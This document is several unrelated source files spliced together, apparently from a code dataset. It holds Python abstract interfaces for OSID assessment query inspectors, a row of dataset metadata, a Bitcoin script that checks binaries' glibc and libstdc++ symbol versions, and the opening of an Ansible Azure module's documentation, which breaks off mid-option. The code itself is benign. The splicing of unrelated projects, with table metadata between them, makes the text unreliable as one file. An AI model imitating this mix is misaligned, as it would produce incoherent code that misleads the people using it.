assessment_terms = property(fget=get_assessment_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_item_query_inspector_record(self, item_record_type):
"""Gets the record query inspector corresponding to the given ``Item`` record ``Type``.
:param item_record_type: an item record type
:type item_record_type: ``osid.type.Type``
:return: the item query inspector record
:rtype: ``osid.assessment.records.ItemQueryInspectorRecord``
:raise: ``NullArgument`` -- ``item_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(item_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.ItemQueryInspectorRecord
class AssessmentQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_level_id_terms(self):
"""Gets the level ``Id`` query terms.
:return: the level ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
level_id_terms = property(fget=get_level_id_terms)
@abc.abstractmethod
def get_level_terms(self):
"""Gets the level query terms.
:return: the level terms
:rtype: ``osid.grading.GradeQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeQueryInspector
level_terms = property(fget=get_level_terms)
@abc.abstractmethod
def get_rubric_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
rubric_id_terms = property(fget=get_rubric_id_terms)
@abc.abstractmethod
def get_rubric_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
rubric_terms = property(fget=get_rubric_terms)
@abc.abstractmethod
def get_item_id_terms(self):
"""Gets the item ``Id`` query terms.
:return: the item ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
item_id_terms = property(fget=get_item_id_terms)
@abc.abstractmethod
def get_item_terms(self):
"""Gets the item query terms.
:return: the item terms
:rtype: ``osid.assessment.ItemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.ItemQueryInspector
item_terms = property(fget=get_item_terms)
@abc.abstractmethod
def get_assessment_offered_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_offered_id_terms = property(fget=get_assessment_offered_id_terms)
@abc.abstractmethod
def get_assessment_offered_terms(self):
"""Gets the assessment offered query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
assessment_offered_terms = property(fget=get_assessment_offered_terms)
@abc.abstractmethod
def get_assessment_taken_id_terms(self):
"""Gets the assessment taken ``Id`` query terms.
:return: the assessment taken ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_taken_id_terms = property(fget=get_assessment_taken_id_terms)
@abc.abstractmethod
def get_assessment_taken_terms(self):
"""Gets the assessment taken query terms.
:return: the assessment taken terms
:rtype: ``osid.assessment.AssessmentTakenQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentTakenQueryInspector
assessment_taken_terms = property(fget=get_assessment_taken_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_assessment_query_inspector_record(self, assessment_record_type):
"""Gets the assessment query inspector record corresponding to the given ``Assessment`` record ``Type``.
:param assessment_record_type: an assessment record type
:type assessment_record_type: ``osid.type.Type``
:return: the assessment query inspector record
:rtype: ``osid.assessment.records.AssessmentQueryInspectorRecord``
:raise: ``NullArgument`` -- ``assessment_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(assessment_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AssessmentQueryInspectorRecord
class AssessmentOfferedQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_assessment_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_id_terms = property(fget=get_assessment_id_terms)
@abc.abstractmethod
def get_assessment_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
assessment_terms = property(fget=get_assessment_terms)
@abc.abstractmethod
def get_level_id_terms(self):
"""Gets the level ``Id`` query terms.
:return: the level ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
level_id_terms = property(fget=get_level_id_terms)
@abc.abstractmethod
def get_level_terms(self):
"""Gets the level query terms.
:return: the level terms
:rtype: ``osid.grading.GradeQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeQueryInspector
level_terms = property(fget=get_level_terms)
@abc.abstractmethod
def get_items_sequential_terms(self):
"""Gets the items sequential query terms.
:return: the boolean terms
:rtype: ``osid.search.terms.BooleanTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.BooleanTerm
items_sequential_terms = property(fget=get_items_sequential_terms)
@abc.abstractmethod
def get_items_shuffled_terms(self):
"""Gets the items shuffled query terms.
:return: the boolean terms
:rtype: ``osid.search.terms.BooleanTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.BooleanTerm
items_shuffled_terms = property(fget=get_items_shuffled_terms)
@abc.abstractmethod
def get_start_time_terms(self):
"""Gets the start time query terms.
:return: the start time terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
start_time_terms = property(fget=get_start_time_terms)
@abc.abstractmethod
def get_deadline_terms(self):
"""Gets the deadline query terms.
:return: the deadline terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
deadline_terms = property(fget=get_deadline_terms)
@abc.abstractmethod
def get_duration_terms(self):
"""Gets the deadline query terms.
:return: the duration terms
:rtype: ``osid.search.terms.DurationTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DurationTerm
duration_terms = property(fget=get_duration_terms)
@abc.abstractmethod
def get_score_system_id_terms(self):
"""Gets the grade system ``Id`` query terms.
:return: the grade system ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
score_system_id_terms = property(fget=get_score_system_id_terms)
@abc.abstractmethod
def get_score_system_terms(self):
"""Gets the grade system query terms.
:return: the grade system terms
:rtype: ``osid.grading.GradeSystemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeSystemQueryInspector
score_system_terms = property(fget=get_score_system_terms)
@abc.abstractmethod
def get_grade_system_id_terms(self):
"""Gets the grade system ``Id`` query terms.
:return: the grade system ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
grade_system_id_terms = property(fget=get_grade_system_id_terms)
@abc.abstractmethod
def get_grade_system_terms(self):
"""Gets the grade system query terms.
:return: the grade system terms
:rtype: ``osid.grading.GradeSystemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeSystemQueryInspector
grade_system_terms = property(fget=get_grade_system_terms)
@abc.abstractmethod
def get_rubric_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
rubric_id_terms = property(fget=get_rubric_id_terms)
@abc.abstractmethod
def get_rubric_terms(self):
"""Gets the assessment query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
rubric_terms = property(fget=get_rubric_terms)
@abc.abstractmethod
def get_assessment_taken_id_terms(self):
"""Gets the assessment taken ``Id`` query terms.
:return: the assessment taken ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_taken_id_terms = property(fget=get_assessment_taken_id_terms)
@abc.abstractmethod
def get_assessment_taken_terms(self):
"""Gets the assessment taken query terms.
:return: the assessment taken terms
:rtype: ``osid.assessment.AssessmentTakenQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentTakenQueryInspector
assessment_taken_terms = property(fget=get_assessment_taken_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_assessment_offered_query_inspector_record(self, assessment_offered_record_type):
"""Gets the assessment offered query inspector record corresponding to the given ``AssessmentOffered`` record ``Type``.
:param assessment_offered_record_type: an assessment offered record type
:type assessment_offered_record_type: ``osid.type.Type``
:return: the assessment offered query inspector record
:rtype: ``osid.assessment.records.AssessmentOfferedQueryInspectorRecord``
:raise: ``NullArgument`` -- ``assessment_offered_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(assessment_offered_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AssessmentOfferedQueryInspectorRecord
class AssessmentTakenQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_assessment_offered_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_offered_id_terms = property(fget=get_assessment_offered_id_terms)
@abc.abstractmethod
def get_assessment_offered_terms(self):
"""Gets the assessment offered query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
assessment_offered_terms = property(fget=get_assessment_offered_terms)
@abc.abstractmethod
def get_taker_id_terms(self):
"""Gets the resource ``Id`` query terms.
:return: the resource ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
taker_id_terms = property(fget=get_taker_id_terms)
@abc.abstractmethod
def get_taker_terms(self):
"""Gets the resource query terms.
:return: the resource terms
:rtype: ``osid.resource.ResourceQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.resource.ResourceQueryInspector
taker_terms = property(fget=get_taker_terms)
@abc.abstractmethod
def get_taking_agent_id_terms(self):
"""Gets the agent ``Id`` query terms.
:return: the agent ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
taking_agent_id_terms = property(fget=get_taking_agent_id_terms)
@abc.abstractmethod
def get_taking_agent_terms(self):
"""Gets the agent query terms.
:return: the agent terms
:rtype: ``osid.authentication.AgentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authentication.AgentQueryInspector
taking_agent_terms = property(fget=get_taking_agent_terms)
@abc.abstractmethod
def get_actual_start_time_terms(self):
"""Gets the start time query terms.
:return: the start time terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
actual_start_time_terms = property(fget=get_actual_start_time_terms)
@abc.abstractmethod
def get_completion_time_terms(self):
"""Gets the completion time query terms.
:return: the completion time terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
completion_time_terms = property(fget=get_completion_time_terms)
@abc.abstractmethod
def get_time_spent_terms(self):
"""Gets the time spent query terms.
:return: the time spent terms
:rtype: ``osid.search.terms.DurationTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DurationTerm
time_spent_terms = property(fget=get_time_spent_terms)
@abc.abstractmethod
def get_score_system_id_terms(self):
"""Gets the grade system ``Id`` query terms.
:return: the grade system ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
score_system_id_terms = property(fget=get_score_system_id_terms)
@abc.abstractmethod
def get_score_system_terms(self):
"""Gets the grade system query terms.
:return: the grade system terms
:rtype: ``osid.grading.GradeSystemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeSystemQueryInspector
score_system_terms = property(fget=get_score_system_terms)
@abc.abstractmethod
def get_score_terms(self):
"""Gets the score query terms.
:return: the score terms
:rtype: ``osid.search.terms.DecimalRangeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DecimalRangeTerm
score_terms = property(fget=get_score_terms)
@abc.abstractmethod
def get_grade_id_terms(self):
"""Gets the grade ``Id`` query terms.
:return: the grade ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
grade_id_terms = property(fget=get_grade_id_terms)
@abc.abstractmethod
def get_grade_terms(self):
"""Gets the grade query terms.
:return: the grade terms
:rtype: ``osid.grading.GradeQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeQueryInspector
grade_terms = property(fget=get_grade_terms)
@abc.abstractmethod
def get_feedback_terms(self):
"""Gets the comment query terms.
:return: the comment terms
:rtype: ``osid.search.terms.StringTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.StringTerm
feedback_terms = property(fget=get_feedback_terms)
@abc.abstractmethod
def get_rubric_id_terms(self):
"""Gets the assessment taken ``Id`` query terms.
:return: the assessment taken ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
rubric_id_terms = property(fget=get_rubric_id_terms)
@abc.abstractmethod
def get_rubric_terms(self):
"""Gets the assessment taken query terms.
:return: the assessment taken terms
:rtype: ``osid.assessment.AssessmentTakenQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentTakenQueryInspector
rubric_terms = property(fget=get_rubric_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_assessment_taken_query_inspector_record(self, assessment_taken_record_type):
"""Gets the assessment taken query inspector record corresponding to the given ``AssessmentTaken`` record ``Type``.
:param assessment_taken_record_type: an assessment taken record type
:type assessment_taken_record_type: ``osid.type.Type``
:return: the assessment taken query inspector record
:rtype: ``osid.assessment.records.AssessmentTakenQueryInspectorRecord``
:raise: ``NullArgument`` -- ``assessment_taken_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(assessment_taken_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AssessmentTakenQueryInspectorRecord
class BankQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_item_id_terms(self):
"""Gets the item ``Id`` query terms.
:return: the item ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
item_id_terms = property(fget=get_item_id_terms)
@abc.abstractmethod
def get_item_terms(self):
"""Gets the item query terms.
:return: the item query terms
:rtype: ``osid.assessment.ItemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.ItemQueryInspector
item_terms = property(fget=get_item_terms)
@abc.abstractmethod
def get_assessment_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_id_terms = property(fget=get_assessment_id_terms)
@abc.abstractmethod
def get_assessment_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
assessment_terms = property(fget=get_assessment_terms)
@abc.abstractmethod
def get_assessment_offered_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_offered_id_terms = property(fget=get_assessment_offered_id_terms)
@abc.abstractmethod
def get_assessment_offered_terms(self):
"""Gets the assessment offered query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
assessment_offered_terms = property(fget=get_assessment_offered_terms)
@abc.abstractmethod
def get_ancestor_bank_id_terms(self):
"""Gets the ancestor bank ``Id`` query terms.
:return: the ancestor bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
ancestor_bank_id_terms = property(fget=get_ancestor_bank_id_terms)
@abc.abstractmethod
def get_ancestor_bank_terms(self):
"""Gets the ancestor bank query terms.
:return: the ancestor bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
ancestor_bank_terms = property(fget=get_ancestor_bank_terms)
@abc.abstractmethod
def get_descendant_bank_id_terms(self):
"""Gets the descendant bank ``Id`` query terms.
:return: the descendant bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
descendant_bank_id_terms = property(fget=get_descendant_bank_id_terms)
@abc.abstractmethod
def get_descendant_bank_terms(self):
"""Gets the descendant bank query terms.
:return: the descendant bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
descendant_bank_terms = property(fget=get_descendant_bank_terms)
@abc.abstractmethod
def get_bank_query_inspector_record(self, bank_record_type):
"""Gets the bank query inspector record corresponding to the given ``Bank`` record ``Type``.
:param bank_record_type: a bank record type
:type bank_record_type: ``osid.type.Type``
:return: the bank query inspector record
:rtype: ``osid.assessment.records.BankQueryInspectorRecord``
:raise: ``NullArgument`` -- ``bank_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(bank_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.BankQueryInspectorRecord
| mit | -1,241,202,665,486,583,600 | 28.48621 | 127 | 0.651264 | false |
gavinandresen/bitcoin-git | contrib/devtools/symbol-check.py | 52 | 6191 | #!/usr/bin/python2
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
A script to check that the (Linux) executables produced by gitian only contain
allowed gcc, glibc and libstdc++ version symbols. This makes sure they are
still compatible with the minimum supported Linux distribution versions.
Example usage:
find ../gitian-builder/build -type f -executable | xargs python contrib/devtools/symbol-check.py
'''
from __future__ import division, print_function, unicode_literals
import subprocess
import re
import sys
import os
# Debian 6.0.9 (Squeeze) has:
#
# - g++ version 4.4.5 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=g%2B%2B)
# - libc version 2.11.3 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=libc6)
# - libstdc++ version 4.4.5 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=libstdc%2B%2B6)
#
# Ubuntu 10.04.4 (Lucid Lynx) has:
#
# - g++ version 4.4.3 (http://packages.ubuntu.com/search?keywords=g%2B%2B&searchon=names&suite=lucid§ion=all)
# - libc version 2.11.1 (http://packages.ubuntu.com/search?keywords=libc6&searchon=names&suite=lucid§ion=all)
# - libstdc++ version 4.4.3 (http://packages.ubuntu.com/search?suite=lucid§ion=all&arch=any&keywords=libstdc%2B%2B&searchon=names)
#
# Taking the minimum of these as our target.
#
# According to GNU ABI document (http://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html) this corresponds to:
# GCC 4.4.0: GCC_4.4.0
# GCC 4.4.2: GLIBCXX_3.4.13, CXXABI_1.3.3
# (glibc) GLIBC_2_11
#
MAX_VERSIONS = {
'GCC': (4,4,0),
'CXXABI': (1,3,3),
'GLIBCXX': (3,4,13),
'GLIBC': (2,11)
}
# See here for a description of _IO_stdin_used:
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=634261#109
# Ignore symbols that are exported as part of every executable
IGNORE_EXPORTS = {
b'_edata', b'_end', b'_init', b'__bss_start', b'_fini', b'_IO_stdin_used'
}
READELF_CMD = os.getenv('READELF', '/usr/bin/readelf')
CPPFILT_CMD = os.getenv('CPPFILT', '/usr/bin/c++filt')
# Allowed NEEDED libraries
ALLOWED_LIBRARIES = {
# bitcoind and bitcoin-qt
b'libgcc_s.so.1', # GCC base support
b'libc.so.6', # C library
b'libpthread.so.0', # threading
b'libanl.so.1', # DNS resolve
b'libm.so.6', # math library
b'librt.so.1', # real-time (clock)
b'ld-linux-x86-64.so.2', # 64-bit dynamic linker
b'ld-linux.so.2', # 32-bit dynamic linker
# bitcoin-qt only
b'libX11-xcb.so.1', # part of X11
b'libX11.so.6', # part of X11
b'libxcb.so.1', # part of X11
b'libfontconfig.so.1', # font support
b'libfreetype.so.6', # font parsing
b'libdl.so.2' # programming interface to dynamic linker
}
class CPPFilt(object):
'''
Demangle C++ symbol names.
Use a pipe to the 'c++filt' command.
'''
def __init__(self):
self.proc = subprocess.Popen(CPPFILT_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def __call__(self, mangled):
self.proc.stdin.write(mangled + b'\n')
self.proc.stdin.flush()
return self.proc.stdout.readline().rstrip()
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.wait()
def read_symbols(executable, imports=True):
'''
Parse an ELF executable and return a list of (symbol,version) tuples
for dynamic, imported symbols.
'''
p = subprocess.Popen([READELF_CMD, '--dyn-syms', '-W', executable], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Could not read symbols for %s: %s' % (executable, stderr.strip()))
syms = []
for line in stdout.split(b'\n'):
line = line.split()
if len(line)>7 and re.match(b'[0-9]+:$', line[0]):
(sym, _, version) = line[7].partition(b'@')
is_import = line[6] == b'UND'
if version.startswith(b'@'):
version = version[1:]
if is_import == imports:
syms.append((sym, version))
return syms
def check_version(max_versions, version):
if b'_' in version:
(lib, _, ver) = version.rpartition(b'_')
else:
lib = version
ver = '0'
ver = tuple([int(x) for x in ver.split(b'.')])
if not lib in max_versions:
return False
return ver <= max_versions[lib]
def read_libraries(filename):
p = subprocess.Popen([READELF_CMD, '-d', '-W', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Error opening file')
libraries = []
for line in stdout.split(b'\n'):
tokens = line.split()
if len(tokens)>2 and tokens[1] == b'(NEEDED)':
match = re.match(b'^Shared library: \[(.*)\]$', b' '.join(tokens[2:]))
if match:
libraries.append(match.group(1))
else:
raise ValueError('Unparseable (NEEDED) specification')
return libraries
if __name__ == '__main__':
cppfilt = CPPFilt()
retval = 0
for filename in sys.argv[1:]:
# Check imported symbols
for sym,version in read_symbols(filename, True):
if version and not check_version(MAX_VERSIONS, version):
print('%s: symbol %s from unsupported version %s' % (filename, cppfilt(sym).decode('utf-8'), version.decode('utf-8')))
retval = 1
# Check exported symbols
for sym,version in read_symbols(filename, False):
if sym in IGNORE_EXPORTS:
continue
print('%s: export of symbol %s not allowed' % (filename, cppfilt(sym).decode('utf-8')))
retval = 1
# Check dependency libraries
for library_name in read_libraries(filename):
if library_name not in ALLOWED_LIBRARIES:
print('%s: NEEDED library %s is not allowed' % (filename, library_name.decode('utf-8')))
retval = 1
exit(retval)
| mit | 8,518,517,211,503,953,000 | 36.75 | 142 | 0.641415 | false |
lowwalker/ansible-modules-core | cloud/azure/azure.py | 6 | 24078 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: azure
short_description: create or terminate a virtual machine in azure
description:
- Creates or terminates azure instances. When created optionally waits for it to be 'running'.
version_added: "1.7"
options:
name:
description:
- name of the virtual machine and associated cloud service.
required: true
default: null
location:
description:
- the azure location to use (e.g. 'East US')
required: true
default: null
subscription_id:
description:
- azure subscription id. Overrides the AZURE_SUBSCRIPTION_ID environment variable.
required: false
default: null
management_cert_path:
description:
- path to an azure management certificate associated with the subscription id. Overrides the AZURE_CERT_PATH environment variable.
required: false
default: null
storage_account:
description:
- the azure storage account in which to store the data disks.
required: true
image:
description:
- system image for creating the virtual machine (e.g., b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu_DAILY_BUILD-precise-12_04_3-LTS-amd64-server-20131205-en-us-30GB)
required: true
default: null
role_size:
description:
- azure role size for the new virtual machine (e.g., Small, ExtraLarge, A6). You have to pay attention to the fact that instances of type G and DS are not available in all regions (locations). Make sure if you selected the size and type of instance available in your chosen location.
required: false
default: Small
endpoints:
description:
- a comma-separated list of TCP ports to expose on the virtual machine (e.g., "22,80")
required: false
default: 22
user:
description:
- the unix username for the new virtual machine.
required: false
default: null
password:
description:
- the unix password for the new virtual machine.
required: false
default: null
ssh_cert_path:
description:
- path to an X509 certificate containing the public ssh key to install in the virtual machine. See http://www.windowsazure.com/en-us/manage/linux/tutorials/intro-to-linux/ for more details.
- if this option is specified, password-based ssh authentication will be disabled.
required: false
default: null
virtual_network_name:
description:
- Name of virtual network.
